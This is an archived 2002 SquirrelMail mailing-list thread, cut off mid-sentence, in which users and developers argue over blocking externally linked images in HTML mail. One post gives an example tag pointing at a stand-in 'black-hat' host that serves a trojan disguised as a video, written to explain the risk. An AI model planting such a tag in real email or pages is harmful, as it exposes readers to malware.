Discussion:
[SM-USERS] image removed for security reasons
N. Gene Pence
2002-03-05 10:10:02 UTC
Permalink
I'm getting the images in email messages replaced with the attached
image that says "This image has been removed for security reasons".
Is SquirrelMail adding this image? Is there a way to turn this off?

Thanks,
Gene Pence
***@sailsoft.com


+----------------------------------+
| |
| www.bytethewonderdog.com |
| |
| \ / |
| 0 0===||||||--- |
| \___/ | | |
| | | |
| |
| "Where only the episodes byte" |
| |
+----------------------------------+
Bron Gondwana
2002-03-05 11:53:02 UTC
Permalink
Post by N. Gene Pence
I'm getting the images in email messages replaced with the attached
image that says "This image has been removed for security reasons". Is
SquirrelMail adding this image? Is there a way to turn this off?
There is a link at the bottom of the page to turn it off for individual
messages, however it is a bad security risk, especially given the
behaviour of certain browsers (*cough*) with regards to executing
untrusted data.

See plenty of discussion on this very list not too long in the past though.

The short answer is that most of the developers believe that the security
risk is sufficient that it shouldn't be enabled by default. Making it an
option the sysadmin can control would be possible, but I don't like it, so
you'll have to find someone else to implement it.

Bron ( author of the link at the bottom to enable it per message, which I
think is a good balance between security and usability for those
very rare messages where outside-linked images are not being used
to harvest spam addresses or track users )
Matt
2002-03-06 01:43:07 UTC
Permalink
To all:

I think the "image security" is a dumb addition. Why should you (meaning
SM developer) tell me how to view my mail. At a mimumum it should be an
option. SM developers should not say stuff like :"so you'll have to find
someone else to implement it." (See bottom of this email for the quote)

Please implement in as an option in the next version, remove it or relegate
it to a pluging. It is beyond the "core" funcitonality of SM and imposes
you views on users like myself.

Im sure Luke would not have included "manditory" option since it skews far
off course from the original intent of SM.

Thanks for the soap box.

-Matt
Post by Bron Gondwana
Post by N. Gene Pence
I'm getting the images in email messages replaced with the attached
image that says "This image has been removed for security reasons". Is
SquirrelMail adding this image? Is there a way to turn this off?
There is a link at the bottom of the page to turn it off for individual
messages, however it is a bad security risk, especially given the
behaviour of certain browsers (*cough*) with regards to executing
untrusted data.
See plenty of discussion on this very list not too long in the past though.
The short answer is that most of the developers believe that the
security risk is sufficient that it shouldn't be enabled by default.
Making it an option the sysadmin can control would be possible, but I
don't like it, so you'll have to find someone else to implement it.
Bron ( author of the link at the bottom to enable it per message, which I
think is a good balance between security and usability for those
very rare messages where outside-linked images are not being used
to harvest spam addresses or track users )
--
squirrelmail-users mailing list
https://lists.sourceforge.net/lists/listinfo/squirrelmail-users
http://squirrelmail.org/cvs
Mike Garrison
2002-03-06 01:53:01 UTC
Permalink
I think that security IS their business. You don't want software that is
developed that has millions of security holes in it do you? There are some
links floating around of "pictures" that exploit bugs in browsers allowing
them to run any command on the computer (eg, deltree, logoff, format, etc).
--
Mike Garrison
***@qtm.net
----- Original Message -----
From: "Matt" <***@mmc.net>
To: <***@brong.net>
Cc: <squirrelmail-***@lists.sourceforge.net>
Sent: Tuesday, March 05, 2002 10:29 PM
Subject: security is not your business: was [SM-USERS] image removed for
security reasons


To all:

I think the "image security" is a dumb addition. Why should you (meaning
SM developer) tell me how to view my mail. At a mimumum it should be an
option. SM developers should not say stuff like :"so you'll have to find
someone else to implement it." (See bottom of this email for the quote)

Please implement in as an option in the next version, remove it or relegate
it to a pluging. It is beyond the "core" funcitonality of SM and imposes
you views on users like myself.

Im sure Luke would not have included "manditory" option since it skews far
off course from the original intent of SM.

Thanks for the soap box.

-Matt
Post by Bron Gondwana
Post by N. Gene Pence
I'm getting the images in email messages replaced with the attached
image that says "This image has been removed for security reasons". Is
SquirrelMail adding this image? Is there a way to turn this off?
There is a link at the bottom of the page to turn it off for individual
messages, however it is a bad security risk, especially given the
behaviour of certain browsers (*cough*) with regards to executing
untrusted data.
See plenty of discussion on this very list not too long in the past though.
The short answer is that most of the developers believe that the
security risk is sufficient that it shouldn't be enabled by default.
Making it an option the sysadmin can control would be possible, but I
don't like it, so you'll have to find someone else to implement it.
Bron ( author of the link at the bottom to enable it per message, which I
think is a good balance between security and usability for those
very rare messages where outside-linked images are not being used
to harvest spam addresses or track users )
--
squirrelmail-users mailing list
https://lists.sourceforge.net/lists/listinfo/squirrelmail-users
http://squirrelmail.org/cvs
Konstantin Riabitsev
2002-03-06 01:56:02 UTC
Permalink
Post by Matt
option. SM developers should not say stuff like :"so you'll have to find
someone else to implement it." (See bottom of this email for the quote)
No, they in fact can, and do. The majority of developers have agreed
that allowing images by default is a very nasty risk, and since we tend
to know better than end-users, we made the choice for them -- mind, with
a way to override the security and view the images anyway.
Post by Matt
Please implement in as an option in the next version, remove it or relegate
it to a pluging. It is beyond the "core" funcitonality of SM and imposes
you views on users like myself.
No, it's not beyond the core of the functionality. Security is a very
integral part of SquirrelMail and we reserve the right to make a
knowledgeable decision about security matters. In fact, this feature was
implemented right after this vulnerability was reported to a security
list.
Post by Matt
Im sure Luke would not have included "manditory" option since it skews far
off course from the original intent of SM.
It's a democracy. Learn it, use it, love it. You are free to patch this
behavior out of the program -- the source is right there.

Security is our #1 concern. If you are looking for a different mindset,
you are welcome to the world of Microsoft.

Regards,
--
0> Konstantin ("Icon") Riabitsev
/ ) Duke University Physics Sysadmin
~ www.duke.edu/~icon/pubkey.asc
Venge -- Lokalsound
2002-03-06 04:34:02 UTC
Permalink
I'm on the same page as Konstantin and the developers. I deal with people
who don't know the first thing about security. People who like to use their
username as their password and think that since they can't hit a particular
website that the internet is down and we are responsible. People don't know
the risk of security and don't appreciate it until they ask one of us to
fix the problem. It's nice to have a security threat stomped, almost like a
warning saying "If you are dumb enough to take this risk, don't bother me
about a solution". I feel that the images security thing is a ++ to SM. As
long as the developers spend their free (and unpaid) time to this project,
we should support their decision to leave code in or out. If you feel
differently, pick up a book on PHP and learn it. It's not the hardest
language, actually it has one of the easiest learning curves. Make your own
fix to a problem (or a customization) and post it. You have to remember,
this is open source and comes as-is. If you want to be a beta tester for
disaster, go and shell out $200 on a microsoft product. SM is meant to be
as easy to use for the end user, but its security must also be kept in
mind. The last thing I need is walking joe smoe through a recovery process
because he likes his p0rn mail in html. I'm not the best PHP programmer,
but I do try to make my own changes as I go along. If you feel that "image
security" is a problem, write a plugin to change it's functionality.

~venge
Post by Konstantin Riabitsev
Post by Matt
option. SM developers should not say stuff like :"so you'll have to
find someone else to implement it." (See bottom of this email for
the quote)
No, they in fact can, and do. The majority of developers have agreed
that allowing images by default is a very nasty risk, and since we tend
to know better than end-users, we made the choice for them -- mind,
with a way to override the security and view the images anyway.
Post by Matt
Please implement in as an option in the next version, remove it or
relegate it to a pluging. It is beyond the "core" funcitonality of SM
and imposes you views on users like myself.
No, it's not beyond the core of the functionality. Security is a very
integral part of SquirrelMail and we reserve the right to make a
knowledgeable decision about security matters. In fact, this feature
was implemented right after this vulnerability was reported to a
security list.
Post by Matt
Im sure Luke would not have included "manditory" option since it skews
far off course from the original intent of SM.
It's a democracy. Learn it, use it, love it. You are free to patch this
behavior out of the program -- the source is right there.
Security is our #1 concern. If you are looking for a different mindset,
you are welcome to the world of Microsoft.
Regards,
--
0> Konstantin ("Icon") Riabitsev
/ ) Duke University Physics Sysadmin
~ www.duke.edu/~icon/pubkey.asc
Matt
2002-03-06 10:55:03 UTC
Permalink
Well, Ive read all of the developers responses and, quite frankly, I think
every response is off base. My favorite is the one telling me to go
support Microsoft or the one telling me that they know better than the end
user.

You claim to say you know what is best for me. You claim to know what I
want. Luke would never do that. Back in the .5 days, Luke opened ideas to
the group and fostered comments before the ideas were implemented. Now,
ideas are implemented and Im told what is best for me.

You say that "this is a democracy" but yet I am not given a choice. Sounds
more like a socialist society. or a democracy among developers.

What happened to the SM community? Have the doors been closed? Are you
suggesting that the only way to participate is to make code changes? There
are alot of other ways to be involved.

I do not, and will not, support any developers decision that I do not agree
with.

Thank you,
Matt
Post by Venge -- Lokalsound
I'm on the same page as Konstantin and the developers. I deal with
people who don't know the first thing about security. People who like
to use their username as their password and think that since they can't
hit a particular website that the internet is down and we are
responsible. People don't know the risk of security and don't
appreciate it until they ask one of us to fix the problem. It's nice to
have a security threat stomped, almost like a warning saying "If you
are dumb enough to take this risk, don't bother me about a solution". I
feel that the images security thing is a ++ to SM. As long as the
developers spend their free (and unpaid) time to this project, we
should support their decision to leave code in or out. If you feel
differently, pick up a book on PHP and learn it. It's not the hardest
language, actually it has one of the easiest learning curves. Make your
own fix to a problem (or a customization) and post it. You have to
remember, this is open source and comes as-is. If you want to be a beta
tester for disaster, go and shell out $200 on a microsoft product. SM
is meant to be as easy to use for the end user, but its security must
also be kept in mind. The last thing I need is walking joe smoe through
a recovery process because he likes his p0rn mail in html. I'm not the
best PHP programmer, but I do try to make my own changes as I go along.
If you feel that "image security" is a problem, write a plugin to
change it's functionality.
~venge
Post by Konstantin Riabitsev
Post by Matt
option. SM developers should not say stuff like :"so you'll have to
find someone else to implement it." (See bottom of this email for
the quote)
No, they in fact can, and do. The majority of developers have agreed
that allowing images by default is a very nasty risk, and since we
tend to know better than end-users, we made the choice for them --
mind, with a way to override the security and view the images anyway.
Post by Matt
Please implement in as an option in the next version, remove it or
relegate it to a pluging. It is beyond the "core" funcitonality of
SM and imposes you views on users like myself.
No, it's not beyond the core of the functionality. Security is a very
integral part of SquirrelMail and we reserve the right to make a
knowledgeable decision about security matters. In fact, this feature
was implemented right after this vulnerability was reported to a
security list.
Post by Matt
Im sure Luke would not have included "manditory" option since it
skews far off course from the original intent of SM.
It's a democracy. Learn it, use it, love it. You are free to patch
this behavior out of the program -- the source is right there.
Security is our #1 concern. If you are looking for a different
mindset, you are welcome to the world of Microsoft.
Regards,
--
0> Konstantin ("Icon") Riabitsev
/ ) Duke University Physics Sysadmin
~ www.duke.edu/~icon/pubkey.asc
--
squirrelmail-users mailing list
https://lists.sourceforge.net/lists/listinfo/squirrelmail-users
http://squirrelmail.org/cvs
Konstantin Riabitsev
2002-03-06 11:16:07 UTC
Permalink
Post by Matt
Well, Ive read all of the developers responses and, quite frankly, I think
every response is off base. My favorite is the one telling me to go
support Microsoft or the one telling me that they know better than the end
user.
Well, don't we? With this feature turned off, I can send you en e-mail
which, in turn, will send threatening e-mails to
***@whitehouse.gov -- FROM YOUR ADDRESS, SIGNED BY YOUR NAME, AND
WITHOUT YOUR KNOWLEDGE!

Is that what you are arguing for?
Post by Matt
You claim to say you know what is best for me. You claim to know what I
want. Luke would never do that.
This is no longer Luke's project. There is a team of 46 developers. And
I didn't claim to know what you want -- I claimed that I know better
about the Internet security than you and 99.9% of squirrelmail
end-users, hence I consider myself in a position to make an educated
decision.
Post by Matt
You say that "this is a democracy" but yet I am not given a choice. Sounds
more like a socialist society. or a democracy among developers.
What the hell are you talking about? When are you NOT given a choice?
Last time I checked, we still released under the GPL, which means that
YOU GET THE FULL SOURCE OF THE SOFTWARE TO MODIFY IN ANY WAY YOU LIKE!
Please read the license -- you are given COMPLETE control over the
software.

How you can complain about "not being given a choice" baffles me.
Post by Matt
I do not, and will not, support any developers decision that I do not agree
with.
You've not given me a single reason why you think you are correct. I
HAVE given you reasons. Convince me that you are right, maybe someone
will heed to your reasoning. I say allowing images in by default is
DANGEROUS and is a horrific PRIVACY concern. I have explained why
previously.

The images were originally removed without even given a link to restore
them, but after many complaints have been received, we allowed a link in
the page to view them. I still prefer to err on the side of caution and
I think this is as FAR as this should be taken.

Feel free to disagree and provide patches.

Regards,
--
0> Konstantin ("Icon") Riabitsev
/ ) Duke University Physics Sysadmin
~ www.duke.edu/~icon/pubkey.asc
Tracy McKibben
2002-03-06 16:33:20 UTC
Permalink
Post by Matt
Well, Ive read all of the developers responses and, quite frankly, I
think every response is off base. My favorite is the one telling me to
go support Microsoft or the one telling me that they know better than
the end user.
Exactly what types of messages are you NOT seeing images in? I subscribe
to two newsletters that are distributed as HTML messages, and the images
display fine in them. The only messages that do NOT display images are
spam, which is what 90% of HTML messages are anyway. Would you be any
happier if SM just blindly displayed/launched/executed anything that comes
through?
Post by Matt
You say that "this is a democracy" but yet I am not given a choice.
Sounds more like a socialist society. or a democracy among developers.
Majority rules in a democracy, and so far, the majority doesn't agree with
you. Even so, you still have choices:
a. Learn PHP and make your own mods
b. Find another product
Post by Matt
What happened to the SM community? Have the doors been closed? Are
you suggesting that the only way to participate is to make code
changes? There are alot of other ways to be involved.
I don't think anybody has suggested that as the only way to participate.
There are other *constructive* ways to contribute. Sitting around crying
because you're the odd man out isn't constructive, and isn't contributing.
Post by Matt
I do not, and will not, support any developers decision that I do not
agree with.
Unless you're PAYING for Squirrelmail, in what way are you supporting or
not supporting the developers? This is free software, resulting from many
people voluntarily working together to make a stable, useable application.
If everybody showed their "appreciation" the way you are, they just might
decide to stop, and Squirrelmail dies. Think about that before you
respond to this with yet more criticism.
Derek Battams
2002-03-06 21:04:03 UTC
Permalink
----- Original Message -----
From: "Tracy McKibben" <***@mckibben.d2g.com>
To: <***@mmc.net>
Cc: <squirrelmail-***@lists.sourceforge.net>
Sent: Wednesday, March 06, 2002 1:24 PM
Subject: Re: security is not your business: was [SM-USERS] image removed
Post by Tracy McKibben
Exactly what types of messages are you NOT seeing images in? I subscribe
to two newsletters that are distributed as HTML messages, and the images
display fine in them. The only messages that do NOT display images are
spam, which is what 90% of HTML messages are anyway. Would you be any
happier if SM just blindly displayed/launched/executed anything that comes
through?
Kind of jumping off on to a side tangent here, but what constitutes an
"insecure" image? All of my testing with 1.2.4 and 1.2.5 has deemed any
image in an HTML email to be replaced by the insecure image file. I just
assumed that all images were considered unsafe and were replaced. Are there
exceptions? I suppose I could dive into the code to find out tomorrow, but
if someone knows the answer off the top of their head then I'd be
appreciative.

Thanks,

Derek
Will Yardley
2002-03-06 21:36:02 UTC
Permalink
Post by Derek Battams
Kind of jumping off on to a side tangent here, but what constitutes an
"insecure" image? All of my testing with 1.2.4 and 1.2.5 has deemed
any image in an HTML email to be replaced by the insecure image file.
i could be wrong, but my understanding is that it's any embedded image
link to an outside image.
--
Will Yardley
william @ newdream . net
Tracy McKibben
2002-03-06 22:34:04 UTC
Permalink
Post by Derek Battams
Kind of jumping off on to a side tangent here, but what constitutes an
"insecure" image?
All of my testing with 1.2.4 and 1.2.5 has deemed
Post by Derek Battams
any image in an HTML email to be replaced by
the insecure image file.
Post by Derek Battams
I just assumed that all images were considered unsafe and
were
Post by Derek Battams
replaced. Are there exceptions? I suppose I could dive into the code
to find out
tomorrow, but if someone knows the answer off the top of
Post by Derek Battams
their head then I'd be
appreciative.

A secure image is one that is actually embedded within or attached to the
corresponding email message. An insecure image is one that your computer
must connect to anoutside source to retrieve. It's possible for all kinds of undesirable
things to be done thisway, such as validating your email address for a spammer, launching an
executable disguised(via MIME type aliasing) as an image, etc...
Bron Gondwana
2002-03-07 10:01:02 UTC
Permalink
Post by Mike Garrison
----- Original Message -----
Sent: Wednesday, March 06, 2002 1:24 PM
Subject: Re: security is not your business: was [SM-USERS] image removed
Post by Tracy McKibben
Exactly what types of messages are you NOT seeing images in? I
subscribe to two newsletters that are distributed as HTML messages,
and the images display fine in them. The only messages that do NOT
display images are spam, which is what 90% of HTML messages are
anyway. Would you be any happier if SM just blindly
displayed/launched/executed anything that comes through?
Kind of jumping off on to a side tangent here, but what constitutes an
"insecure" image? All of my testing with 1.2.4 and 1.2.5 has deemed
any image in an HTML email to be replaced by the insecure image file.
I just assumed that all images were considered unsafe and were
replaced. Are there exceptions? I suppose I could dive into the code
to find out tomorrow, but if someone knows the answer off the top of
their head then I'd be
appreciative.
An insecure image is any image that is being referenced to an external
server rather than attached to the email. It only takes one tag of the
form:

<IMG SRC="Loading Image...">

and they know that my address has a valid user reading it.

More to the point, it only takes one.

<OBJECT SRC="http://black-hat.com/installtrojan.mpg">

where the .mpg returns Content-Type: application/x-active-x-script
(or whatever the actual type is) for various commonly installed
Internet Explorers to violate the local trust model and run this
unsafe piece of ActiveX. I don't remember the exact details, and
on this link, I'm not about to try googling.

Bron.
Matt Kaminer
2002-03-07 09:29:04 UTC
Permalink
Well, Ive read all of the developers responses and, quite frankly, I think
every response is off base. My favorite is the one telling me to go
support Microsoft or the one telling me that they know better than the end
user.

You claim to say you know what is best for me. You claim to know what I
want. Luke would never do that. Back in the .5 days, Luke opened ideas to
the group and fostered comments before the ideas were implemented. Now,
ideas are implemented and Im told what is best for me.

You say that "this is a democracy" but yet I am not given a choice. Sounds
more like a socialist society. or a democracy among developers.

What happened to the SM community? Have the doors been closed? Are you
suggesting that the only way to participate is to make code changes? There
are alot of other ways to be involved.

I do not, and will not, support any developers decision that I do not agree
with.

Thank you,
Matt
Post by Venge -- Lokalsound
I'm on the same page as Konstantin and the developers. I deal with
people who don't know the first thing about security. People who like
to use their username as their password and think that since they can't
hit a particular website that the internet is down and we are
responsible. People don't know the risk of security and don't
appreciate it until they ask one of us to fix the problem. It's nice to
have a security threat stomped, almost like a warning saying "If you
are dumb enough to take this risk, don't bother me about a solution". I
feel that the images security thing is a ++ to SM. As long as the
developers spend their free (and unpaid) time to this project, we
should support their decision to leave code in or out. If you feel
differently, pick up a book on PHP and learn it. It's not the hardest
language, actually it has one of the easiest learning curves. Make your
own fix to a problem (or a customization) and post it. You have to
remember, this is open source and comes as-is. If you want to be a beta
tester for disaster, go and shell out $200 on a microsoft product. SM
is meant to be as easy to use for the end user, but its security must
also be kept in mind. The last thing I need is walking joe smoe through
a recovery process because he likes his p0rn mail in html. I'm not the
best PHP programmer, but I do try to make my own changes as I go along.
If you feel that "image security" is a problem, write a plugin to
change it's functionality.
~venge
Post by Konstantin Riabitsev
Post by Matt
option. SM developers should not say stuff like :"so you'll have to
find someone else to implement it." (See bottom of this email for
the quote)
No, they in fact can, and do. The majority of developers have agreed
that allowing images by default is a very nasty risk, and since we
tend to know better than end-users, we made the choice for them --
mind, with a way to override the security and view the images anyway.
Post by Matt
Please implement in as an option in the next version, remove it or
relegate it to a pluging. It is beyond the "core" funcitonality of
SM and imposes you views on users like myself.
No, it's not beyond the core of the functionality. Security is a very
integral part of SquirrelMail and we reserve the right to make a
knowledgeable decision about security matters. In fact, this feature
was implemented right after this vulnerability was reported to a
security list.
Post by Matt
Im sure Luke would not have included "manditory" option since it
skews far off course from the original intent of SM.
It's a democracy. Learn it, use it, love it. You are free to patch
this behavior out of the program -- the source is right there.
Security is our #1 concern. If you are looking for a different
mindset, you are welcome to the world of Microsoft.
Regards,
--
0> Konstantin ("Icon") Riabitsev
/ ) Duke University Physics Sysadmin
~ www.duke.edu/~icon/pubkey.asc
--
squirrelmail-users mailing list
https://lists.sourceforge.net/lists/listinfo/squirrelmail-users
http://squirrelmail.org/cvs
Will Yardley
2002-03-07 09:42:05 UTC
Permalink
Post by Matt
You say that "this is a democracy" but yet I am not given a choice.
Sounds more like a socialist society. or a democracy among
developers.
you are given the code freely, and you have the choice to change it.
developers have a responsibility to produce safe, secure code; otherwise
people won't use their products.
Post by Matt
I do not, and will not, support any developers decision that I do not
agree with.
so change it.
--
Will Yardley
william @ newdream . net
Bron Gondwana
2002-03-07 09:52:05 UTC
Permalink
Post by Matt
Well, Ive read all of the developers responses and, quite frankly, I
think every response is off base. My favorite is the one telling me to
go support Microsoft or the one telling me that they know better than
the end user.
Sorry - I hope I haven't sounded like that. The impression I was trying
to create was that I personally believe that it's a bad idea for security,
and I don't support it being the default. I also won't personally write
code to allow an administrator to make it default for their users, because
I don't believe it to be a sound decision. I have no problem with another
developer doing so, however I believe most of the developers understand
the security issue and hence have a similar aversion to adding this
'feature request'.
Post by Matt
You claim to say you know what is best for me. You claim to know what
I want. Luke would never do that. Back in the .5 days, Luke opened
ideas to the group and fostered comments before the ideas were
implemented. Now, ideas are implemented and Im told what is best for
me.
I wasn't there then. The squirrelmail-devel list is fully open to anyone,
as is the CVS commit list. This list (sm-users) is too busy to keep up
with regularly. I'm fairly new to the SM Devel team, and hence trying not
to make waves - but I would point out that a project with one person that's
still starting off is easier to treat in this way than a project with 42
active developers, all scratching their own itches out of preference.
Post by Matt
You say that "this is a democracy" but yet I am not given a choice.
Sounds more like a socialist society. or a democracy among developers.
Something like that ;) Not that I'm qualified to talk at the moment,
being roaring drunk and at the far end of a very slow modem connection
(our ADSL was supposed to be functional today - it's not - I've flown
interstate to configure this end, and I'm now apt-get updating a server
that really needs to be updated - up the same modem I'm trying to
catch up on all my email through. Slow is not descriptive enough. Still,
about 10 standard drinks will drown any woes!
Post by Matt
What happened to the SM community? Have the doors been closed? Are
you suggesting that the only way to participate is to make code
changes? There are alot of other ways to be involved.
I really didn't mean it like that. I meant that I _personally_ am not
comfortable with that change, and will not make it. If you want it done,
find someone who is comfortable with it. The community is still here, but
you can't ask developers to write something they have a philosophical
aversion too - it won't happen.
Post by Matt
I do not, and will not, support any developers decision that I do not
agree with.
And I will not implement any user requests that I don't agree with, sounds
perfectly reasonable to me. Yes, we have been adding new features to SM
(supposedly stable) quite fast - and some people don't agree with that,
however (without actually doing a straw poll here) - I think most people
see security as being important - and as a developer I feel I have a
moral obligation to produce secure code anywhere that my code will be
interacting with other systems. To do anything else would be irresponsible.

I am aware of attacks against users which are propagated through off site
images. To put it another way - Squirrelmail is a MUA (mail user agent),
not a static web site. It has more in common with non-web mail
applications than web services where the only content is trusted content.
To make this even more complex, this MUA is split into two parts - the
server side HTML engine, and the client side HTML rendering engine (this
is the user's web browser) Because the HTML being displayed by SM (in HTML
mode) is _NOT_TRUSTED_CONTENT_, my moral belief is that SM must remove
_ALL_ known tainting before presenting this content.

To make this even more difficult, the client half of the SquirrelMUA system
is outside our control, and exists in multiple different and buggy in
interesting ways varients. To make this entire system safe for the end
user involves even more complications and compromises than the already
complex single-component MUAs that run on a client desktop.

If I haven't already made my point - I feel I have a moral obligation to
prevent the client part of SM (the user's browser) from being fooled into
making connections to unknown (and possibly black-hat) servers, which it
will happily do, since it views the HTML coming from
www.trusted-site.com/squirrelmail/* as being trusted code, and will happily
open a connection to and possibly (depending on the HTML client bugs)
execute code from www.badguy.com/.

I'm sorry that you feel excluded here - I really didn't mean to give that
impression - I just feel strongly about this issue, and I don't wish to
create security issues for many other users of SM by adding this option.

Regards,
Bron.
Bron Gondwana
2002-03-10 12:48:02 UTC
Permalink
Post by Matt
I think the "image security" is a dumb addition. Why should you
(meaning SM developer) tell me how to view my mail. At a mimumum it
should be an option. SM developers should not say stuff like :"so
you'll have to find someone else to implement it." (See bottom of
this email for the quote)
I don't know if you've read my posts on this topic since here (I've been
on a really slow link for the past few days, and haven't been able to
keep up with all the email. Ahh the joys of broadband :)

Specifically, I have a big ethical problem with making a program
insecure by default. I (an SM developer) am not telling you how
to view your mail. If I was, I'd probably tell you to go use
telnet straight to the IMAP port (143) of you IMAP server if you
wanted to see raw, unparsed, un-made-safe-for-transport-across-
the-web-and-into-buggy-client-side-browsers'ed messages.
Post by Matt
Please implement in as an option in the next version, remove it or
relegate it to a pluging. It is beyond the "core" funcitonality of SM
and imposes you views on users like myself.
No, I disagree. In the same way that encoding the message as HTML
(escaping characters like < to &lt;) is required to make it display
properly in your web browser, removing links that can cause your
web browser to do unexpected things (like embedded scripts, external
site image loads and other 'nasties') is a core part of providing
a secure viewing environment for Squirrelmail's users.

The whole point is that incoming email messages are by definition
_untrusted_.

We can't allow them to be passed un-filtered to the client side
browser, because web browers treat the data they receive as being
_trusted_ within the context of the site they are coming from, and
many people will have Squirrelmail in their Intranet/Trusted rather
than Internet/Semi-trusted zone, and certainly not listed as untrusted,
which it would be if we allowed the composers of email messages to
embed aribrary tags in squirrelmail's output.
Post by Matt
Im sure Luke would not have included "manditory" option since it skews
far off course from the original intent of SM.
I'm not Luke, and don't have a clue what he would have done - but I would
like to think that he would put security and reliability before badly
thought out features like passing raw HTML from untrusted emails straight
through to the client web browser. This wouldn't be an issue if
Squirrelmail was just rawly encoding the output (i.e. escaping all tags
and other HTMLisms in the message so that they were reliably safe) - but
no, people want to view HTML emails by their content, formatted in the
way the HTML instructs. To do this safely in a HTML display environment
(like a web based email client), it is necessary to filter those tags.
Post by Matt
Thanks for the soap box.
No problems, however, I also like standing on the soap box at times.
...
Post by Matt
Post by Bron Gondwana
The short answer is that most of the developers believe that the
security risk is sufficient that it shouldn't be enabled by default.
Making it an option the sysadmin can control would be possible, but I
don't like it, so you'll have to find someone else to implement it.
...

And I also stand by my right to say that I will not implement what I
believe to be a mis-feature and have ethical objections to inflicting
on users. I believe that previous versions of Squirrelmail had a
_bug_ where by they would send dangerous HTML to the client without
filtering it. This bug is now fixed. Once the user has verified that
the HTML is from a trusted source, then (and only then) does it make
sense for Squirrelmail to allow it through.

Maybe I should have been more clear that it's not just a "I don't feel
like it" version of don't like it, it's a "I REALLY DON'T LIKE THIS"
to the idea of sending tainted data to the client browser without
cleaning it to the best of our ability.

Bron.
Deano!
2002-03-06 02:57:05 UTC
Permalink
I'd just like to chime in a view observations as a Squirrel user/admin:

1) I like* that you guys are on top of security.

2) I would* like as many security features to be "turn-offable" from the
admin.

In my particular case, the mail server disables funky images before they
ever hit the client, so it would be nice to be able to turn off the
feature in Squirrel, since the truly paranoid don't rely on client-side
security to begin with. ;)

3) I'm definitely getting an eerie feeling that a lot* of issues, and
even bugs, are not very high priorities anymore. For instance, the whole
"fetch/IMAP" error really really needs to be addressed in a
soon-to-be-released 1.2.6.

I'm all for letting people fork code, or even making features like
turning off image security a plugin (hint hint, someone?)... But to ask
users to scour the bug tracker/make manual 'fixes' on their own just to
get Squirrel working, seems a bit much. I'm not familiar enough with PHP
to guarantee it, but especially in the case of this error, which still
plagues me, changes could be made to the base code to fix it... If
there's a particular reason why making these fixes 'default' would be
bad, at least tell us why, eh?

Anyway, (mostly) good work!

-deano
Bron Gondwana
2002-03-10 13:11:02 UTC
Permalink
Post by Deano!
1) I like* that you guys are on top of security.
Thanks :)
Post by Deano!
2) I would* like as many security features to be "turn-offable" from
the admin.
That sort of makes sense, _if_ (and this seems to be a big if)
a) the Admin can guarantee that their users will only be using web
browsers that aren't hackable by dud-image links being in them; OR
b) all the dangerous HTML is filtered out _before_ reaching Squirrelmail.
Post by Deano!
In my particular case, the mail server disables funky images before
they ever hit the client, so it would be nice to be able to turn off
the feature in Squirrel, since the truly paranoid don't rely on
client-side security to begin with. ;)
So you're saying that your mail server disables _all_ the possible HTML
encoding security risks (funky images, embedded links to .MPG files that
are actually executables)? In that case, I don't see what the problem
is, since it won't tickle this 'feature' of Squirrelmail.

The only case I can really see where your argument holds water is if
you aren't accepting _any_ emails from untrusted sources. Remember
also the messages can arrive in the users' mailboxes through
un-expected sources. Maybe they've installed the POP3 plugin and
are pulling the messages down from an external mail server that doesn't
implement the same filters. Maybe this POP3 server is even on a different
port, bypassing your proxies. Maybe someone has created a plugin that
pulls in messages from Hotmail (or Operamail, or Eudoramail, or Yahoo...)
and dumps them on the IMAP server. Maybe they're not even using
Squirrelmail, but another IMAP client that does any of the above.

Are you the admin going to remember that Squirrelmail isn't safe, so
you have to watch all these other paths? Maybe, but I'd guess that
most other admins aren't likely to. I certainly wouldn't.

To address another point:
"the truly paranoid don't rely on
client-side security to begin with."

No, the truly paranoid don't rely on any one layer of security, they
provide security at every layer they possibly can. The security
requirements (especially in terms of stripping dodgy HTML) are
_different for Squirrelmail than for a SMTP server_. They are
even different for SM than for other IMAP clients. I've already
addressed this in a post a couple of days ago - but SM is an
application split into two parts - one part is the PHP server, and
the other part is a web browser on a client machine somewhere,
running just about any dodgy buggy version of some vendor's idea
of what a web browser should be.

We need to make sure that whoever is using that web browser is not
exposed to any security risks we are aware of. To do any less would
be ethically a big problem to me, and if the other developers of
Squirrelmail told me not to fix those security risks to my
satisfaction I would be forced to either fork or find another email
client that I personally felt comfortable using and making my users
use (I provide Squirrelmail to my business, where it's running on a
server on the intranet, and hence has the ability to make them do
things to the local network if it runs untrusted code. I will not
leave known security holes open for them).
Post by Deano!
3) I'm definitely getting an eerie feeling that a lot* of issues, and
even bugs, are not very high priorities anymore. For instance, the
whole "fetch/IMAP" error really really needs to be addressed in a
soon-to-be-released 1.2.6.
That's because we're too busy arguing tired old problems again and
again with people who don't appear (at least from my point of view)
to have thought through the implications of their attitude to security.
I treat data in the IMAP spool as _untrusted_, and will go to pains to
make sure that it is not executed as trusted data. The web browser will
execute certain kinds of code sent to it by Squirrelmail, so I must make
sure that nothing from the IMAP spool is sent to the browser without
first de-tainting it. Easy when you consider it that way.
Post by Deano!
I'm all for letting people fork code, or even making features like
turning off image security a plugin (hint hint, someone?)... But to ask
users to scour the bug tracker/make manual 'fixes' on their own just
to get Squirrel working, seems a bit much. I'm not familiar enough
with PHP to guarantee it, but especially in the case of this error,
which still plagues me, changes could be made to the base code to fix
it... If there's a particular reason why making these fixes 'default'
would be bad, at least tell us why, eh?
I believe I already have, however:

* I don't think that the vast majority of sites are capable of ensuring
there is no dangerous material in any users's IMAP spool.
* If the option is there, some monkey is going to enable it without
knowing what they're doing (read this very list for examples of people
turning on db_prefs just because it's there, without even having DB
support available - or messing with default_folder_prefix without
knowing what their IMAP server uses, and ignoring the sensible and
sucessfully workable default).
* I haven't seen a single good reason why previewing the message first
to ensure it is from a reputable source (and not a spam with hidden
hack-fields) before enabling the unsafe bits is not a sufficient
feature.
* Per above - reading the subject is not sufficient - when using "Next"
and "Previous" links, you often don't know what the next message will
be until it's displayed. If it contains code that tickles an
insecurity in your browser, then it's already too late.

If you can provide me with a good refutation of point 3 (i.e. a reason
why previewing the message without unsafe options before enabling them
(for that message only) is important enough to over-ride the security
concerns) then I'm willing to reconsider, but until then...

... I'll go sleep, and deal with those bugs later some time.
Post by Deano!
Anyway, (mostly) good work!
Thanks,

Bron.

Venge -- Lokalsound
2002-03-06 16:14:02 UTC
Permalink
Post by Matt
You claim to say you know what is best for me. You claim to know what
I want. Luke would never do that. Back in the .5 days, Luke opened
ideas to the group and fostered comments before the ideas were
implemented. Now, ideas are implemented and Im told what is best for
me.
^
Not what is best for "you", what is best for the overall performance and
longevity of this product. I'm sure if Luke saw the security problems with
